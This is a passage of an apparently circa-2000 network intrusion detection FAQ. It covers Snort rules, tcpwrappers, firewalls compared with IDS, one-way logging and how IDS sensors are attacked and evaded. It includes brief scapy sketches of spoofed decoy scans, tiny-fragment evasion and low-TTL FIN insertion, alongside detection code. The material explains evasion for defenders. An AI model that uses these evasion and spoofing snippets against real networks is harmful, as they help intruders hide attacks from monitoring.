However, such systems have an advantage over protocol analysis systems. Because they do not have preconceived notions about what network traffic is supposed to look like, they can often detect attacks that other systems might miss. For example, if a company is running a POP3 server on a different port, it is likely that protocol analysis systems will not recognize the traffic as POP3. Therefore, any attacks against that port will go undetected. On the other hand, a network-grep style system doesn't necessarily care about port numbers and will check for the same signatures regardless of port.
Snort has recently become very popular, and is considered really cool by a lot of people. It contains over 100 of its own signatures, and others can be found on the Internet.
Following is an example rule:
# here's an example of PHF attack detection where just a straight text string
# is searched for in the app layer
alert tcp any any -> 192.168.1.0/24 80 (msg:"PHF attempt"; content:"/cgi-bin/phf";)

This rule says to alert on a TCP connection from any IP address and any port to port 80 on the 192.168.1.x subnet. It searches for the content "/cgi-bin/phf" anywhere in the application data. If it finds such content, it alerts the console with the message "PHF attempt".
Snort is usually run from the command line, pointing it at a rules file and a network interface (for example, something like "snort -d -c snort.conf -i eth0").
Also, snort has a number of options to be used just to sniff network traffic.
Rules:
See ftp://coast.cs.purdue.edu/pub/tools/unix/argus for more info. Also see ftp://ftp.sei.cmu.edu/pub/argus-1.5
See above for info on the commercial version.
tcpwrappers sits between inetd and the services it launches (like ftp, telnet, etc.). inetd will first call tcpwrappers, which will do some authentication (by IP address) and logging. Then, tcpwrappers will call the actual service, if need be.
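A minimal sketch of a typical tcpwrappers configuration, assuming telnet and ftp are the services you want to restrict and that 192.168.1.x is your trusted subnet: deny everything in /etc/hosts.deny, then allow specific service/client pairs in /etc/hosts.allow.

In /etc/hosts.deny:
  ALL: ALL

In /etc/hosts.allow:
  in.telnetd: 192.168.1.
  in.ftpd: LOCAL

With rules like these, tcpwrappers refuses (and logs) telnet connections from anywhere outside 192.168.1.x, producing "refused connect" entries like the log line quoted earlier in this document.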
For more details, contact AUSCERT directly on auscert@auscert.org.au.
Firewalls are simply a device that shuts off everything, then turns back on only a few well-chosen items. In a perfect world, systems would already be "locked down" and secure, and firewalls would be unneeded. The reason we have firewalls is precisely because security holes are left open accidentally.
Thus, when a firewall is installed, the first thing it does is stop ALL communication. The firewall administrator then carefully adds "rules" that allow specific types of traffic to go through the firewall. For example, a typical corporate firewall allowing access to the Internet would stop all UDP and ICMP datagram traffic, stop incoming TCP connections, but allow outgoing TCP connections. This stops all incoming connections from Internet hackers, but still allows internal users to connect in the outgoing direction.
A firewall is simply a fence around your network, with a couple of well-chosen gates. A fence has no capability of detecting somebody trying to break in (such as digging a hole underneath it), nor does a fence know if somebody coming through the gate is allowed in. It simply restricts access to the designated points.
In summary, a firewall is not the dynamic defensive system that users imagine it to be. In contrast, an IDS is much more of that dynamic system. An IDS does recognize attacks against the network that firewalls are unable to see.
For example, in April of 1999, many sites were hacked via a bug in ColdFusion. These sites all had firewalls that restricted access only to the web server at port 80. However, it was the web server that was hacked. Thus, the firewall provided no defense. On the other hand, an intrusion detection system would have discovered the attack, because it matched the signature configured in the system.
Another problem with firewalls is that they are only at the boundary of your network. Roughly 80% of all financial losses due to hacking come from inside the network. A firewall at the perimeter of the network sees nothing going on inside; it only sees the traffic that passes between the internal network and the Internet.
Some reasons for adding IDS to your firewall are:
"Defense in depth, and overkill paranoia, are your friends." (quote by Bennett Todd <bet at mordor dot net>). Hackers are much more capable than you think; the more defenses you have, the better. And they still won't protect you from the determined hacker. They will, however, raise the bar on determination needed by the hackers.
Consider bridge building throughout history. As time goes on, technology improves, and bridges are able to span ever larger distances (such as the Golden Gate bridge in SF, whose span is measured in kilometers). Bridge builders are very conservative due to the immense embarrassment (not to mention loss of life) should the bridges fail. Therefore, they use much more material (wood, stone, steel) than they need, and they don't create spans nearly as long as they think they can. However, as time goes on, as bridges prove themselves, engineers take more and more risks, until a bridge fails. Then all the engineers become much more conservative again. As has been quoted: "It's easy to build a bridge that doesn't fall down; what takes skill is building a bridge that just barely doesn't fall down."
In much the same way, most firewall administrators take the conservative approach. It is easy to build a firewall that can't be hacked by being overly conservative and paranoid, and simply turn off all but the absolutely necessary services.
However, in the real world, engineers are not allowed to be sufficiently paranoid. Just like bridge builders want to span ever wider rivers and gorges, corporations want to ever expand their services on the Internet. This puts immense pressure on firewall admins to relax the barriers. This process will continue up to the point where the system is hacked, at which point the corporation will become much more conservative. From this perspective, one could say that corporate dynamics are such that they will generally push the system to the point where it gets hacked.
As every firewall admin knows, the system is under constant attack from the Internet. Hackers from all over the world are constantly probing the system for weaknesses. Moreover, every few months a new security vulnerability is found in popular products, at which point the hackers simply scan the entire Internet looking for people with that hole, causing thousands of websites to be hacked. Such recent holes have been the ColdFusion cfmdocs bug and the Microsoft .htr buffer overflow.
There are a huge number of "script-kiddies" that are always running automated programs (like SATAN) on the Internet looking for holes. Without a firewall, these automated programs can detect and exploit holes literally in the blink of an eye. Even dial-up users who use the Internet only a few hours a week are getting scanned on a regular basis; high-profile corporate sites will be scanned by script-kiddies much more often.
Remember that firewalls are simple rule-based systems that allow/deny traffic going through them. Even "content inspection" style firewalls do not have the capability to clearly say whether the traffic constitutes an attack; they only determine whether it matches their rules or not.
For example, a firewall in front of a web server might block all traffic except for TCP connections to port 80. As far as the firewall is concerned, any port-80 traffic is legitimate. An IDS, on the other hand, examines that same traffic and looks for pattern of attack. An IDS system doesn't really care if the manager decided to allow port 80 and deny the rest: as far as the IDS is concerned, all traffic is suspicious.
This means that an IDS must look at the same source of data as the firewall: namely, the raw network traffic on the wire. If an IDS sat "downstream" from the firewall instead of side-by-side, it would be limited to seeing only the traffic the firewall allows through, and would miss everything the firewall blocks. In the above example, it would see only the port 80 traffic and none of the other probes against the site.
[Diagram: a firewall sits between the Internet and the corporate network. IDS sensors are shown both outside the firewall on the Internet side (IDS#1, attached next to the firewall, and IDS#3) and inside it on the corporate side (IDS#2 and IDS#4).]
Some common questions are:
The most important metric is packets/second. Marketing people use weasel words to say that their products can keep up with a full 100-mbps network, but that is only under ideal conditions. Network World did a review in August of 1998 where products failed at roughly 30% network load (50,000 packets/second). Likewise, Network Computing did a review in September of 1999 with real-world traffic where several products that claimed 100-mbps could still not keep up.
The following questions are commonly asked, but are less likely to produce meaningful answers:
If you install an intrusion detection system, you WILL see intrusions on an ongoing basis. In a SOHO environment, you will likely get scanned by a hacker once a week. On a well-known web site, hackers will probe your site for vulnerabilities many times per day. On a large internal corporate network, you will find constant suspicious activity by internal employees.
The first problem that you are likely to be confronted with is employees surfing porn sites on the web. Just about every long-term administrator I know has interesting stories about this. Most don't care about the porn; it is just embarrassing knowing what people are up to.
It is interesting that many otherwise conservative corporations do not outright restrict such surfing -- because it is often the executives themselves that do it. Lower-level engineers detecting such activities usually fear to bring the subject up.
The next problem that engineers face is a Human Resource (HR) issue. You will find users doing things they shouldn't, so a lot of time is spent interfacing with HR working with the offending employee.
The last problem is what to do about Internet script-kiddies and hackers probing your system. Usually, a call to the ISP in question or e-mail to their "abuse@" mailbox suffices. Sometimes the ISP will be grateful -- because their own systems have been compromised.
Remember that even what appears to be the most egregious hack may, in fact, be innocuous, so approach other people with dignity and respect.
However, companies do not like being in the position of being "big brother". Rules against inappropriate surfing inevitably lead to grey areas (for example: Playboy.com recently had an article on computer security, which an employee could easily have stumbled across while doing a legitimate search on the web).
Intrusion detection systems, firewalls, proxy servers, and sniffing programs can be configured to log all web surfing traffic to log files, including who accessed which websites. Most companies already have these logs, but few make use of this information. Network technicians do not want to take on the role of HR and prosecute people. (In many cases, the culprits are executives and going after them can be a career limiting move (CLM)).
One elegant solution is posting such information to a public internal website. This has been known to dramatically affect inappropriate surfing. Rather than having a central authority judging appropriateness, it leaves it up to the individual to make that judgement.
For example, section 4.3 above discusses a "network grep" system that passes network traffic through a pattern match system. Such a system could be built with some knowledge of C and a UNIX system.
Similarly, section 4.5.2 describes a PERL based system that parses log files from a firewall.
Different countries and states have different laws, but it is generally legal to monitor your OWN traffic for intrusions.
One concern that people have is that running a NIDS on a corporate network results in network managers viewing employee Internet surfing activity (sometimes network managers find top executives surfing porn sites). As the network equipment and the user's workstation belong to the company, the legal precedent is that use of the corporate equipment implies consent to monitoring. However, it is recommended that companies explicitly state in employee handbooks that their network activity will be monitored. At a minimum, it avoids embarrassing situations.
WORM (Write-Once-Read-Many) drives have historically been used for this purpose, but they are expensive and finicky. They probably don't have drivers for your system, and your software is likely incompatible with them in other ways (i.e. some systems alter the files a little bit as they create them, which doesn't work on a WORM).
One problem with any system is that entropy sets in. It may be provably secure today, but it is unlikely to stay that way. For example, one technique for logging would be to employ syslog where the receiver doesn't have a TCP/IP stack but instead uses TCPDUMP to save the raw packets to a file (presumably, a utility would be run at a later date to reconstruct the syslog entries). From the entropy perspective, there is no guarantee that a TCP/IP stack won't be installed during an update, or when a new person joins the team, or when machines get shuffled around.
To combat such entropy, the model system uses the "snipped-wire" approach. In this model, an extra Ethernet adapter is installed in the machine that is generating the data, and the receive wire is cut. If an accident later happens such that the extra adapter is connected to an unsecured network, then few problems are likely to result.
In much the same way, the receiving system should have only a single Ethernet adapter, and its transmit wire should be cut. It would be best to also disable the TCP/IP stack and instead force the data through packet sniffing utilities. (Yes, there are attacks that can compromise the system even when no responses are ever received).
Normal TCP/IP won't work in this scenario. You will need to hard-code the route and ARP tables on the generating machine in order to force the traffic out the one-way wire. Similarly, you will need to use special utilities on the receiving machine in order to parse incoming packets back into useful data.
UDP-based transports like 'syslog' and SNMP Traps are the most useful transports in this situation. They are easy to generate on the outgoing machine as they are built into most systems. Since responses aren't generated anyway, it doesn't hamper the normal flow of applications. Likewise, they are easy to parse back into SNMP messages or syslog files on the receiving end, or at the least, it is easy to harden a TCP/IP stack to receive only those ports. At the very least, TFTP or NFS can be configured to transport files to a TCP/IP stack on the other side.
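For illustration, the following C sketch hand-crafts a syslog-style datagram toward a receive-only log host. UDP to port 514 never needs a reply, so it still works when the return path is physically cut; the destination address and message are assumptions, and with a one-way wire you would also need static ARP and route entries so the kernel transmits without ever hearing an answer.

  #include <arpa/inet.h>
  #include <netinet/in.h>
  #include <stdio.h>
  #include <string.h>
  #include <sys/socket.h>
  #include <unistd.h>

  int main(void)
  {
      int s = socket(AF_INET, SOCK_DGRAM, 0);
      if (s < 0) { perror("socket"); return 1; }

      struct sockaddr_in dst;
      memset(&dst, 0, sizeof(dst));
      dst.sin_family = AF_INET;
      dst.sin_port   = htons(514);                     /* standard syslog/UDP port */
      dst.sin_addr.s_addr = inet_addr("192.168.99.2"); /* illustrative log host */

      const char *msg = "<13>nids-sensor: suspicious connection logged"; /* PRI 13 = user.notice */
      sendto(s, msg, strlen(msg), 0, (struct sockaddr *)&dst, sizeof(dst));
      close(s);
      return 0;
  }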
One problem that goes along with this is data management. You cannot connect the data repository to a network, so anything you use to backup the system must be installed on the system itself.
Personally, the system I use is an old Pentium-90 computer with a 6-gig drive, a CD-ROM writer, and a sniffing utility that dumps all the network traffic (a 416-kbps DSL connection) to packet capture files on the disk. A couple of simple filters remove a lot of the bulk so that downloading the latest RedHat distribution doesn't fill up the disk. I prefer this solution over actual log files because it captures absolutely everything that happens on the wire, even the numerous so-called stealth attempts.
Update: There have been suggestions that serial links, parallel ports, and special SCSI protocols might likewise provide a logical "air-gap". This would entail a little programming on your part, but since entropy will likely cause such a link to fail outright rather than silently open a vulnerability, it would be a good choice.
Primary systems such as firewalls, encryption, and authentication are rock solid. Bugs or misconfiguration often lead to problems in these systems, but the underlying concepts are "provably" accurate.
The underlying concepts behind NIDS are not absolutely accurate. Intrusion detection systems suffer from two problems: normal traffic causes many false positives (crying wolf), and careful hackers can evade or disable the intrusion detection systems. Indeed, there are many proofs that show how network intrusion detection systems will never be fully accurate.
This doesn't mean intrusion detection systems are invalid. Hacking is so pervasive on today's networks that people are regularly astounded when they first install such systems (both inside and outside the firewall). Good intrusion detection systems can dramatically improve the security of a site. It just needs to be remembered that intrusion detection systems are backup: the "provably accurate" systems regularly fail (due to human error), and the "provably incorrect" systems regularly work.
Switched networks (such as 100-mbps and gigabit Ethernet switches) pose dramatic problems for network intrusion detection systems. There is no easy place to "plug in" a sensor in order to see all the traffic.
For example, somebody on the same switched fabric as the CEO has free rein to attack the CEO's machine all day long, such as with a password grinder targeting File and Print Sharing.
There are some solutions to this problem, but not all of them are satisfactory.
The problem with tapping into the cable, especially those between switches, is that they generate huge amounts of traffic. Most NIDS cannot handle very high loads before going "blind".
Thanks to Christopher Zarcone < czarcone at acm dot org > for this info.
Network intrusion detection systems sit at centralized locations on the network. They must be able to keep up with, analyze, and store information generated by potentially thousands of machines. It must emulate the combined entity of all the machines sending traffic through its segment. Obviously, it cannot do this fully, and must take short cuts.
This section lists some typical resource issues.
When buying an IDS, ask the vendor how many packets/second the system can handle. Many vendors will try to tell you how many bits/second, but per-packet is the real performance bottleneck. Virtually all vendors can handle 100-mbps traffic using 1500-byte packets, few can handle 100-mbps traffic using 60-byte packets.
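To see why, ignore framing overhead and divide the line rate by the packet size: 100 Mbps / (1500 bytes x 8 bits) is roughly 8,300 packets/second, while 100 Mbps / (60 bytes x 8 bits) is roughly 208,000 packets/second -- about 25 times more per-packet work at the same bit rate.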
When buying an IDS, ask the vendor how many simultaneous TCP connections it can handle.
The intrusion detection system itself can be attacked in the following ways.
Network intrusion detection systems are generally built as "passive monitors" from COTS (commercial-off-the-shelf) computers. The monitors are placed alongside the networking stream, not in the middle. This means that if they cannot keep up with the high rates of traffic, they have no way to throttle it back. They must start dropping packets. This is known as trying to drink from a firehose. Few NIDS today can keep up with a fully saturated 100-mbps link (where "saturated" means average sized packets of 180 bytes, which is roughly 50,000 packets/second).
Not only will the sensor start dropping packets it cannot process, high traffic rates can completely shut down the sensor. For example, consider a sensor that can process a maximum of 20,000 frames/second. When the offered load is 40,000 frames/second, actual processing usually drops to 10,000 frames/second or 5,000 frames/second, or maybe even zero. This is because frame reception and frame analysis are two different activities. Most architectures require the system to capture the packet even when it is too busy to analyze it, which takes even more time away from analysis.
Therefore, an intruder can attack the sensor by saturating the link. If the intruder is local, he/she can simply use a transmit program. A 400-MHz box can fully saturate a link with 60-byte packets, breaking most IDS systems that might be attached to the segment.
A remote attacker can execute smurf or fraggle attacks, likewise saturating links. It is unlikely an attacker will have a fast enough link themselves (100-mbps is quite rare) in order to be able to attack head-on in this manner.
The 'nmap' port scanning tool contains a feature known as "decoy" scans (the -D option). It scans using hundreds of spoofed source addresses as well as the real IP address of the attacker. It therefore becomes nearly impossible for the administrator to discover which of the IP addresses was real and which were decoys.
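A rough sketch of what a decoy scan does (this assumes the scapy packet library is available; the addresses are hypothetical documentation addresses, not real hosts):

    # Decoy-scan sketch: the same probe is sent from many spoofed source
    # addresses plus the real one, so the victim's logs show dozens of
    # apparent attackers for every real one. Illustrative only.
    from random import randint
    from scapy.all import IP, TCP, send

    target  = "192.0.2.50"                                 # hypothetical victim
    real_ip = "192.0.2.99"                                 # hypothetical attacker
    decoys  = ["198.51.100.%d" % i for i in range(1, 30)]  # spoofed decoy sources

    for src in decoys + [real_ip]:
        probe = IP(src=src, dst=target) / TCP(dport=80, sport=randint(1024, 65535), flags="S")
        send(probe, verbose=0)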
Any attack can be built from the same components. A massive attack with spoofed addresses can always hide a real attack inserted somewhere inside. Administrators would be hard pressed to discover the real attack inside of all that noise.
These two scenarios still leave forensics data behind, though: if the attacker is suspected, the data is still there to examine. Another attack is therefore to fill up event storage. When the database fills up, either no more attacks will be recorded, or older attacks will be deleted to make room. Either way, no evidence remains that will point to the intruder.
A NIDS is an extremely complex system, equivalent in complexity to an entire TCP/IP stack running numerous services. This means the NIDS is susceptible to such attacks as SYN floods and smurf attacks.
Moreover, the numerous protocols NIDS analyze leave them open to outright crashes when unexpected traffic is seen. Attackers can often buy the same intrusion detection system used by their victim, then experiment in many ways in order to find packets that will kill the IDS. During the attack, the intruder first kills the IDS, then continues undetected.
This section describes simple evasion tactics that fool basic intrusion detection systems. The next section will describe advanced measures.
Note that fragmenting the IP packets in the middle of the TCP header has long been used to evade firewall port filtering.
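A minimal sketch of that trick (again assuming the scapy library, with a hypothetical target address): the connection request is split into 8-byte IP fragments, so the TCP flags land in the second fragment, where a filter or IDS that examines only the first fragment never sees them.

    # Tiny-fragment sketch: split a SYN so the TCP flags fall outside the
    # first fragment. Illustrative only.
    from scapy.all import IP, TCP, fragment, send

    pkt = IP(dst="192.0.2.50") / TCP(dport=23, flags="S")
    frags = fragment(pkt, fragsize=8)   # first fragment: ports + sequence number
                                        # second fragment: TCP flags, window, ...
    for f in frags:
        send(f, verbose=0)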
Some industrial grade NIDS can reassemble traffic. Also, some firewalls can "normalize" traffic by forcing reassembly before passing the traffic through to the other end.
For example, some POP3 servers are vulnerable to a buffer overflow when a long password is entered. There exist several popular attack scripts for this vulnerability. One intrusion detection system might contain 10 patterns to match the 10 most common scripts, while another intrusion detection system looks at the password field and alarms when more than 100 bytes have been entered. The first system is easy to evade simply by changing the attack script, while the second catches any attack on this weakness.
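A toy contrast of the two styles (the byte patterns and the 100-byte threshold below are purely illustrative, not taken from any real product):

    # Hypothetical signatures copied from known exploit scripts.
    EXPLOIT_SIGNATURES = [b"\x90\x90\x90\x90\x90\x90\x90\x90", b"popper_overflow_v1"]

    def signature_match(pop3_line: bytes) -> bool:
        # Style 1: match byte patterns lifted from the published scripts.
        return any(sig in pop3_line for sig in EXPLOIT_SIGNATURES)

    def protocol_analysis(pop3_line: bytes) -> bool:
        # Style 2: parse the protocol and alarm on an absurdly long password,
        # which also catches rewritten or brand-new exploit scripts.
        if pop3_line.upper().startswith(b"PASS "):
            return len(pop3_line) - 5 > 100
        return False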
The typical example is simple changes to the URL. For example, this document can be retrieved through the URL http://www.robertgraham.com/pubs/network-intrusion-detection.html, but the same request can be rewritten with escaped characters, duplicate slashes, or self-referencing directories (such as "/./"). Even though the exact byte pattern has changed, the meaning hasn't been altered. A NIDS looking for the original URL on the wire won't detect the altered one unless it has anti-evasion countermeasures.
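A sketch of the kind of "de-evasion" normalization such a countermeasure performs before pattern matching (the sample path is illustrative):

    # Normalize a request path so escaped characters and self-referencing
    # directories no longer hide the pattern being matched.
    from urllib.parse import unquote

    def normalize_path(path: str) -> str:
        path = unquote(path)                    # undo %-escaping, e.g. %70hf -> phf
        while "//" in path:
            path = path.replace("//", "/")      # collapse duplicate slashes
        while "/./" in path:
            path = path.replace("/./", "/")     # collapse self-referencing dirs
        return path

    print(normalize_path("/cgi-bin/.//%70hf"))  # prints: /cgi-bin/phf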
The seminal paper on network intrusion detection "evasion" was written by Thomas H. Ptacek and Timothy N. Newsham. The original PostScript version is available at http://www.aciri.org/vern/Ptacek-Newsham-Evasion-98.ps, while an HTML mirror is available at http://www.robertgraham.com/mirror/Ptacek-Newsham-Evasion-98.html. Ptacek claims that many/most of the commercial products still (October 1999) have serious problems in this regard. Much of this section summarizes that paper.
The paper describes the abstract concept that the network model used by the network intrusion detection system is different from the real world.
For example, an intruder might send a TCP FIN packet that the NIDS sees, but which the victim host never sees. This causes the NIDS to believe the connection is closed when in fact it isn't. Since TCP connections do not send "keep-alives", the intruder could wait hours or days after this "close" before continuing the attack. In practice, most interesting services do kill the connection after a certain time with no activity, but the intruder can still cause a wait of several minutes before continuing.
The first such attack is to find a way to pass packets as far as the NIDS, but cause a later router to drop packets. This depends upon the router configuration, but typical examples include low TTL fields, fragmentation, source routing, and other IP options. If there is a slow link past the NIDS, then the hacker can flood the link with high priority IP packets, and send the TCP FIN as a low priority packet -- the router's queuing mechanism will likely drop the packet.
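As a concrete sketch of the low-TTL variant (scapy assumed; the address, hop counts, and sequence numbers are made up): the forged FIN is given a TTL large enough to reach the sensor but too small to reach the victim, so only the NIDS believes the connection has been torn down.

    # Insertion via low TTL: the sensor sees this FIN, the victim never does.
    # Illustrative only.
    from scapy.all import IP, TCP, send

    victim = "192.0.2.50"
    # Suppose the sensor sits 3 hops away and the victim 6 hops away.
    fake_fin = IP(dst=victim, ttl=4) / TCP(dport=80, flags="FA", seq=1000, ack=2000)
    send(fake_fin, verbose=0)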
Another approach is to consider what the host will or will not accept. For example, different TCP stacks respond differently to slightly invalid input (which programs like 'nmap' and 'queso' use to fingerprint operating systems). Typical ways of causing different traffic to be accepted or rejected are to send TCP options, cause timeouts for IP fragments or TCP segments, overlap fragments/segments, or send slightly wrong values in TCP flags or sequence numbers.
The Ptacek/Newsham paper concentrated on IP fragmentation and TCP segmentation problems in order to highlight bugs in IDSs. For example, they noted that if overlapping fragments are sent with different data, some systems prefer the data from the first fragment (WinNT, Solaris), whereas others keep the data from the last fragment (Linux, BSD). The NIDS has no way of knowing which the end-node will accept, and may guess wrong.
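A toy illustration of that ambiguity (this ignores the rule that real fragment offsets are multiples of 8, purely to keep the example short):

    # Two "fragments" overlap at bytes 2-3 with different data; a first-wins
    # policy and a last-wins policy reassemble different streams, and the
    # sensor cannot know which policy the victim's stack uses.
    def reassemble(fragments, policy):
        buf = {}
        for offset, data in fragments:
            for i, byte in enumerate(data):
                pos = offset + i
                if policy == "last" or pos not in buf:
                    buf[pos] = byte
        return bytes(buf[i] for i in sorted(buf))

    frags = [(0, b"AAAA"), (2, b"BBBB")]
    print(reassemble(frags, "first"))   # b'AAAABB' -- first fragment wins (WinNT, Solaris)
    print(reassemble(frags, "last"))    # b'AABBBB' -- last fragment wins (Linux, BSD)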
Their TCP connection analysis was even more in-depth, discussing ways of "de-synchronizing" TCP connections, which are much more fragile than one would think. Again, the IDS cannot correctly model all possible TCP/IP stack behavior and figure out what the end-node will accept as data. TCP also has the same overlap problems as IP fragmentation. For example, an intrusion detection system might accept the first segment and ignore later overlapping segments, even though most hosts accept the later segments.
They ran tests against various intrusion detection systems in order to see whether they could be evaded. Their results were dismal -- one major intrusion detection system could be completely evaded simply by fragmenting packets, and others could be thrown off by "de-synchronizing" from the data the end-node would accept.
Scans websites looking for vulnerable CGI programs. Contains over 10 different IDS-evasion techniques that either change the URL being scanned or alter the HTTP protocol itself.
Contains the "fragrouter" that forces all traffic to fragment, which demonstrates how easy it is for hackers/crackers to do the same in order to evade intrusion detection. This accepts incoming traffic then fragments it according to various rules (IP fragmentation with various sizes and overlap, TCP segmentation again with various sizes and overlaps, TCP insertion in order to de-synchronize the connection, etc.).
Also contains the "tcpreplay" program, which dumps high loads onto an Ethernet segment in order to verify a NIDS can keep up.
Some scripts for CASL are at: http://www.roses-labs.com/labs/labs.htm
The state of standardization is extremely undeveloped at this point. The problem is that IDS sensors do not really detect intrusions. Instead, they detect evidence that indicates an intrusion, which is not quite the same thing.
For example, one NIDS might detect a buffer-overflow attempt against an FTP server by tracking the length of the user name (e.g. BlackICE). Another might catalogue a list of signatures (patterns) of known exploits, and look for those patterns anywhere in the control connection (e.g. Snort). Yet others might look for typical signs of intrusions, such as a long string of x86 NOOPs in the control connection (Dragon). A host based system might detect when the FTP service crashes (which most buffer-overflow exploits cause).
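Toy versions of two of these detection styles (the 128-byte threshold and the 32-byte NOP run below are illustrative values, not the thresholds used by the products named above):

    def long_username_check(ftp_line: bytes) -> bool:
        # Protocol-analysis style: alarm when the USER argument is implausibly long.
        return ftp_line.upper().startswith(b"USER ") and len(ftp_line) > 128

    def nop_sled_check(payload: bytes) -> bool:
        # Signature style: alarm on a long run of x86 NOP (0x90) bytes anywhere
        # in the control connection, a typical buffer-overflow tell-tale.
        return b"\x90" * 32 in payload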
The CVE effort is best thought of as a "concordance": it allows people to sync up between the various advisories and IDS/scanner checks. It solves the problem that different products detect such things differently. For example, one intrusion detection system might detect a buffer overflow by examining the length of a field, and therefore map to multiple CVE entries and advisories for different products that have buffer overflows in the same field. Likewise, another IDS system might match the signatures of specific exploits (from published scripts) of a single vulnerability.
Therefore, there might be one-to-many, many-to-one, or many-to-many mappings between any product or set of advisories. The CVE provides a concordance between various systems.
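A sketch of what such a concordance looks like in practice (the check names and CVE numbers below are invented purely for illustration):

    # One generic length-based check maps to several CVE entries, while several
    # exploit-specific signatures map back to a single CVE entry.
    check_to_cve = {
        "pop3-long-password":   ["CVE-XXXX-0001", "CVE-XXXX-0002", "CVE-XXXX-0003"],
        "popper-exploit-sig-a": ["CVE-XXXX-0001"],
        "popper-exploit-sig-b": ["CVE-XXXX-0001"],
    }

    def advisories_for(check_name):
        return check_to_cve.get(check_name, [])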
Your gameplan should consist of the following steps:
Remember: if you put one of these systems on the Internet, within a month it will be discovered and hacked.
If you need a secure system inside your company (for example, one that holds financial information), set up a similar system outside your company with bogus data. If a hacker compromises that system, you'll learn how to protect the one inside your company from similar exploits.
The San Diego Supercomputer Center has left machines up that can be hacked. http://security.sdsc.edu/incidents/worm.2000.01.18.shtml
The classic treatise on the subject is "An Evening with Berferd", which details how somebody set up a honeypot: http://www.all.net/books/berferd/berferd.html.
I personally have done the following sorts of things:
There are ways around this. Virtual honeypots cannot be used to launch effective attacks, and you can keep an eye on really vulnerable systems.